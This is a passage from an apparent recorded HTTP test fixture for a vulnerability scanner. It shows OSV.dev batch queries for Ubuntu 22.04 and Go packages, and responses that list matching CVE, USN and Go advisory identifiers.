"UBUNTU-CVE-2025-68973", "modified": "2026-02-05T00:30:28.335358Z" }, { "id": "USN-7412-1", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7412-2", "modified": "2026-02-10T04:47:47Z" }, { "id": "USN-7946-1", "modified": "2026-02-10T04:50:47Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2016-20013", "modified": "2026-02-03T07:12:11.178156Z" }, { "id": "UBUNTU-CVE-2025-0395", "modified": "2026-02-06T21:35:29.229625Z" }, { "id": "UBUNTU-CVE-2025-15281", "modified": "2026-02-04T07:39:07.958164Z" }, { "id": "UBUNTU-CVE-2025-4802", "modified": "2026-02-04T04:09:49.871743Z" }, { "id": "UBUNTU-CVE-2025-8058", "modified": "2026-02-04T07:39:09.389770Z" }, { "id": "UBUNTU-CVE-2026-0861", "modified": "2026-02-04T07:39:03.415441Z" }, { "id": "UBUNTU-CVE-2026-0915", "modified": "2026-02-23T00:02:27.504192Z" }, { "id": "USN-7259-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7541-1", "modified": "2026-02-10T04:48:59Z" }, { "id": "USN-7760-1", "modified": "2026-02-10T04:49:49Z" }, { "id": "USN-8005-1", "modified": "2026-02-23T00:13:53.339268Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-1390", "modified": "2026-02-04T04:28:50.933288Z" }, { "id": "USN-7287-1", "modified": "2026-02-10T04:47:15Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-2236", "modified": "2026-01-20T17:51:42.649938Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-12243", "modified": "2026-02-04T02:53:36.843010Z" }, { "id": "UBUNTU-CVE-2025-14831", "modified": "2026-02-28T05:58:56.935176Z" }, { "id": "UBUNTU-CVE-2025-32988", "modified": "2026-02-04T02:15:37.273955Z" }, { "id": "UBUNTU-CVE-2025-32989", "modified": "2026-02-04T03:37:18.739300Z" }, { "id": "UBUNTU-CVE-2025-32990", "modified": "2026-02-04T03:31:01.615385Z" }, { "id": "UBUNTU-CVE-2025-6395", "modified": "2026-02-04T03:31:22.603031Z" }, { "id": "UBUNTU-CVE-2025-9820", "modified": "2026-02-28T06:16:45.816014Z" }, { "id": "USN-7281-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7635-1", "modified": "2026-02-10T04:49:34Z" }, { "id": "USN-8043-1", "modified": "2026-02-17T22:00:37.652199Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2018-5709", "modified": "2025-10-24T04:46:51Z" }, { "id": "UBUNTU-CVE-2024-26458", "modified": "2026-02-04T03:00:45.815615Z" }, { "id": "UBUNTU-CVE-2024-26461", "modified": "2026-02-04T04:19:35.724133Z" }, { "id": "UBUNTU-CVE-2024-3596", "modified": "2026-02-04T04:28:06.065165Z" }, { "id": "UBUNTU-CVE-2025-24528", "modified": "2026-02-04T04:40:58.959893Z" }, { "id": "UBUNTU-CVE-2025-3576", "modified": "2026-02-04T02:50:47.063994Z" }, { "id": "USN-7257-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7314-1", "modified": "2026-02-10T04:47:17Z" }, { "id": "USN-7542-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2025-62813", "modified": "2025-10-27T08:32:45.494712Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2024-10041", "modified": "2026-01-20T19:07:32.667161Z" }, { "id": "UBUNTU-CVE-2025-6020", "modified": "2026-02-04T02:31:29.332885Z" }, { "id": "UBUNTU-CVE-2025-8941", "modified": "2026-01-20T18:46:31.526274Z" }, { "id": "USN-7580-1", "modified": "2026-02-10T04:49:00Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-41409", "modified": "2025-10-24T04:53:52Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2024-13176", "modified": "2026-03-09T11:29:11.736076Z" }, { "id": "UBUNTU-CVE-2024-41996", "modified": "2026-02-06T21:00:29.439853Z" }, { "id": "UBUNTU-CVE-2024-9143", "modified": "2026-03-09T11:29:50.088989Z" }, { "id": "UBUNTU-CVE-2025-15467", "modified": "2026-03-05T18:42:43.606385Z" }, { "id": "UBUNTU-CVE-2025-27587", "modified": "2026-02-06T21:55:03.879396Z" }, { "id": "UBUNTU-CVE-2025-68160", "modified": "2026-02-12T06:59:44.011039Z" }, { "id": "UBUNTU-CVE-2025-69418", "modified": "2026-02-06T22:01:44.179826Z" }, { "id": "UBUNTU-CVE-2025-69419", "modified": "2026-02-12T06:59:40.921557Z" }, { "id": "UBUNTU-CVE-2025-69420", "modified": "2026-02-12T06:58:38.833674Z" }, { "id": "UBUNTU-CVE-2025-69421", "modified": "2026-03-02T12:02:19.670699Z" }, { "id": "UBUNTU-CVE-2025-9230", "modified": "2026-03-09T12:25:45.048270Z" }, { "id": "UBUNTU-CVE-2026-22795", "modified": "2026-02-12T06:58:35.942634Z" }, { "id": "UBUNTU-CVE-2026-22796", "modified": "2026-02-12T06:59:02.005868Z" }, { "id": "UBUNTU-CVE-2026-2673", "modified": "2026-03-18T08:04:38.900604Z" }, { "id": "USN-7278-1", "modified": "2026-02-10T04:47:15Z" }, { "id": "USN-7786-1", "modified": "2026-02-10T04:50:09Z" }, { "id": "USN-7980-1", "modified": "2026-03-02T11:56:15.392710Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2021-46848", "modified": "2026-02-12T06:44:04.921097Z" }, { "id": "UBUNTU-CVE-2024-12133", "modified": "2026-02-12T06:31:24.332995Z" }, { "id": "UBUNTU-CVE-2025-13151", "modified": "2026-02-12T06:43:59.770392Z" }, { "id": "USN-7275-1", "modified": "2026-02-10T04:46:30Z" }, { "id": "USN-7954-1", "modified": "2026-02-10T04:50:47Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2023-7008", "modified": "2025-10-09T04:59:16Z" }, { "id": "UBUNTU-CVE-2025-4598", "modified": "2026-02-04T02:49:04.264249Z" }, { "id": "UBUNTU-CVE-2026-4105", "modified": "2026-03-18T08:05:12.098241Z" }, { "id": "USN-7559-1", "modified": "2026-02-10T04:48:59Z" } ] }, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-4899", "modified": "2025-09-08T16:49:53Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-50495", "modified": "2026-02-04T03:21:31.661318Z" }, { "id": "UBUNTU-CVE-2025-6141", "modified": "2026-01-20T18:35:03.980742Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-29383", "modified": "2025-10-24T05:01:54Z" }, { "id": "UBUNTU-CVE-2024-56433", "modified": "2026-01-20T18:02:13.226633Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2023-31486", "modified": "2025-10-24T05:01:58Z" }, { "id": "UBUNTU-CVE-2023-47039", "modified": "2025-10-24T05:02:19Z" }, { "id": "UBUNTU-CVE-2024-56406", "modified": "2026-02-04T02:50:55.689079Z" }, { "id": "UBUNTU-CVE-2025-40909", "modified": "2026-02-04T02:15:05.324531Z" }, { "id": "USN-7434-1", "modified": "2026-02-10T04:47:48Z" }, { "id": "USN-7678-1", "modified": "2026-02-10T04:49:41Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-45582", "modified": "2026-01-20T18:59:29.811906Z" } ] }, {}, {}, { "vulns": [ { "id": "USN-8091-1", "modified": "2026-03-13T23:29:29.779929Z" } ] }, { "vulns": [ { "id": "UBUNTU-CVE-2026-27171", "modified": "2026-02-27T09:59:13Z" } ] } ] } headers: Content-Length: - "11965" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14321 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": "8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "fzf" }, "version": "0.29.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.18.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, "version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": "11.1.0ubuntu4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "mawk" }, "version": "1.3.4.20200120-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "perl" }, "version": "5.34.0-3ubuntu1.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sed" }, "version": "4.8-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sensible-utils" }, "version": "0.0.17" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "sysvinit" }, "version": "3.01-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "tar" }, "version": "1.34+dfsg-1ubuntu0.1.22.04.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ubuntu-keyring" }, "version": "2021.03.26" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "usrmerge" }, "version": "25ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "zlib" }, "version": "1:1.2.11.dfsg-2ubuntu9.2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Scanning_Ubuntu_image_with_go_OS_packages_json url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 17153 body: | { "results": [ {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2016-2781", "modified": "2026-03-18T06:32:17.714169Z" }, { "id": "UBUNTU-CVE-2025-5278", "modified": "2026-03-18T07:55:13.290684Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2025-6297", "modified": "2026-02-04T03:36:18.990840Z" }, { "id": "UBUNTU-CVE-2026-2219", "modified": "2026-03-14T09:17:58.405826Z" }, { "id": "USN-7768-1", "modified": "2026-02-10T04:49:49Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2022-27943", "modified": "2026-02-25T19:00:26.332370Z" }, { "id": "UBUNTU-CVE-2023-4039", "modified": "2026-03-14T09:09:23.235151Z" }, { "id": "USN-7700-1", "modified": "2026-02-10T04:49:46Z" } ] }, { "vulns": [ { "id": "GO-2022-0477", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0493", "modified": "2026-02-04T03:42:54.589715Z" }, { "id": "GO-2022-0515", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0520", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0521", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0522", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0523", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0524", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0525", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0526", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0527", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0531", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0532", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0533", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0537", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-0969", "modified": "2026-02-04T02:41:02.475503Z" }, { "id": "GO-2022-1037", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1038", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1039", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2022-1095", "modified": "2026-02-04T04:25:45.960420Z" }, { "id": "GO-2022-1143", "modified": "2026-02-04T04:08:13.589543Z" }, { "id": "GO-2022-1144", "modified": "2026-02-04T04:29:40.352025Z" }, { "id": "GO-2023-1568", "modified": "2026-02-04T02:54:08.789114Z" }, { "id": "GO-2023-1569", "modified": "2026-02-04T03:22:48.161542Z" }, { "id": "GO-2023-1570", "modified": "2026-02-04T02:57:33.465285Z" }, { "id": "GO-2023-1571", "modified": "2026-02-04T03:36:14.767832Z" }, { "id": "GO-2023-1621", "modified": "2026-02-04T02:47:06.125087Z" }, { "id": "GO-2023-1702", "modified": "2026-02-04T03:43:08.732164Z" }, { "id": "GO-2023-1703", "modified": "2026-02-04T04:24:15.366665Z" }, { "id": "GO-2023-1704", "modified": "2026-02-04T04:39:41.032390Z" }, { "id": "GO-2023-1705", "modified": "2026-02-04T03:44:01.631552Z" }, { "id": "GO-2023-1751", "modified": "2026-02-04T04:31:56.779446Z" }, { "id": "GO-2023-1752", "modified": "2026-02-04T03:50:58.841420Z" }, { "id": "GO-2023-1753", "modified": "2026-02-04T02:22:30.446388Z" }, { "id": 